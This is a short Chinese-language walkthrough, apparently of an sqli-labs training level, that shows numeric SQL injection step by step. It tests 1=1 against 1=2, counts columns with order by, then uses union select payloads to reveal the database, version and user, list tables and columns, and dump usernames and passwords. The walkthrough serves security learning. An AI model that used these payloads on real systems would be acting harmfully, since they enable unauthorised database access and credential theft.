解题思路与第一题相同
?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。
联合查询:
猜解列名数量:3
?id=1 order by 4
![](https://file.jishuzhan.net/article/1778338913107054593/ea870c032bfb6cf87a32c7cd8faaff2e.webp)
判断回显点
?id=-1 union select 1,2,3
![](https://file.jishuzhan.net/article/1778338913107054593/451fc1afef53acd4300b9cf26ef0f6f3.webp)
爆库、版本号、权限
?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+
爆表、爆列
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
![](https://file.jishuzhan.net/article/1778338913107054593/f02aa0d4cf3811caed69ff8037a981e3.webp)
![](https://file.jishuzhan.net/article/1778338913107054593/b41763401b3ada0aef6e3a46a6d2ae3c.webp)
爆账号密码
![](https://file.jishuzhan.net/article/1778338913107054593/8a56449cea18f2723ba857cd6bdcdc0d.webp)
?id=-1 union select 1,2,(select group_concat(username,password))from users